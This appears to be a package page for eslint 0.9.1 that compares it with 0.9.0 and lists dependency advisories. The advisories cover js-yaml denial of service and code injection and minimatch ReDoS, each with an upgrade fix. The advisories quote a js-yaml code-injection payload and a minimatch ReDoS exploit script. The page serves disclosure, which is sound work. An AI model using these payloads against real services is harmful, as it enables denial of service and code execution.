eslint version 0.9.1 is a minor patch release following closely after version 0.9.0, both iterations of the popular JavaScript linting tool developed by Nicholas C. Zakas and the eslint team. Both versions are based on Esprima and share a common core functionality: statically analyzing JavaScript code to identify potential errors, enforce coding styles, and improve code quality before runtime. Examining the dependencies, both 0.9.0 and 0.9.1 maintain identical requirements for dependencies like chalk, debug, escope, esprima and devDependencies such as chai, mocha, browserify, indicating no fundamental changes in the underlying technologies or testing frameworks used. From a developer perspective, upgrading from 0.9.0 to 0.9.1 likely involves incorporating minor bug fixes or incremental improvements, rather than any groundbreaking new features that would drastically alter the linting experience, though specific changes are not present in the package metadata. Given the "patch" nature of the release, developers encountering specific edge-case errors or style incompatibilities in 0.9.0 should consider upgrading to 0.9.1, as the latter may offer resolutions or refinements addressing those issues. For new projects, starting with the most recent patch version (0.9.1) is generally advisable due to the likelihood of incorporating the latest stability improvements. The release dates indicate rapid iteration and attentiveness of the eslint team, showing that they are focused on providing fixes quickly.
All the vulnerabilities related to the version 0.9.1 of the package
Denial of Service in js-yaml
Versions of js-yaml prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml prior to 3.13.1 are vulnerable to Code Injection. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have toString as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.